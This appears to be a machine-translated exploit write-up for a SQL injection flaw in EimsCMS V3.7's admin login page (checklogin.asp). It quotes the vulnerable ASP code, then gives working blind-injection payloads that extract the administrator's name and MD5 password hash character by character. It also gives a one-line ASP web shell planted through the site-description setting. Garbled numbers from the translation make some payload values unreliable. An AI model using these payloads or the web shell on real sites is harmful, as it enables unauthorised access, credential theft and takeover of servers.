verify login

| EimsCMS V3. 7 0day Default background: admin/login. asp Default database: data/eimscms. mdb Vulnerability file: admin/checklogin. asp --- <% Response. Write "" Response. Write "" Response. Write "" Response. Write "verify login" Response. Write "" Response. Write "" '-------------------------------------------- Dim LoginName,LoginPassword,AdminName,Password,Permissions,UserName,Rs,Sql,UserID,SortID LoginName = Trim(Trim(Request. Form("LoginName"))) LoginPassword = Md5(Request. Form("LoginPassword")) If Session("CheckCode")<>Trim(Request. Form("CheckCode")) Then ClMsg("CAPTCHA error!") Set Rs = Server. Createobject("Adodb. Recordset") Sql="Select * From [eims_User] Where Item1='"&LoginName&"'" //loginname is clearly not filtered Rs. Open Sql,Conn,1,1 If Rs. Eof Then ClMsg("this user does not exist!") Else UserID = Int(Trim(Rs("ItemID"))) SortID = Int(Trim(Rs("SortID"))) AdminName = Trim(Rs("Item1")) Password = Trim(Rs("Item2")) Permissions = Trim(Rs("Item9")) ItemRec = Trim(Rs("ItemRec")) End If If SortID <> 1 Then ClMsg("you are not admin!") If Not ItemRec Then ClMsg("this user is already frozen!") If LoginPassword<>Password Then ClMsg("password error!") If LoginName = AdminName And LoginPassword = Password Then //this sentence to the loginname there is compare, compare....... Use: Username injection configuration statement is as follows: a' or '1'='1 //hint“you are not administrator”description of the sql was established because'1'='1'establishment a' or (select top 1 len(Item1) from eims_User where ItemID=1)>=1 and '1'='1 //The ItemID=1 This indicates that the administrator Item1 shows the administrator name Judge Item1 length: a' or (select top 1 len(Item1) from eims_User where ItemID=1)>=1 and '1'='1 User name value: a' or (select top 1 asc(mid(Item1,6,1)) from eims_User where ItemID=1)=1 1 1 and '1'='1 The length of the password(the default is 1 6 bits of md5) of: a' or (select top 1 len(Item2) from eims_User where ItemID=1)=1 6 and '1'='1 //Item2 is password is 1 6 bits of the md5 1 6-bit password value: a' or (select top 1 asc(mid(Item2,6,1)) from eims_User where ItemID=1)>=5 3 and '1'='1 Background to take the shell : Landing back－Site Settings－site description insert the contents as follows: [www.007hack.com]()"+execute(request("007hack"))+"www.007hack.com The word Trojan address: Tasteless two places, one is for the access database, the second is a verification code, but only the patience to hand as much as you can crack the md5 Without any technical, record, next time again encountered just keep the change table.......

EimsCMS V3. 7 a very tasteless of vulnerability-vulnerability warning-the black bar safety net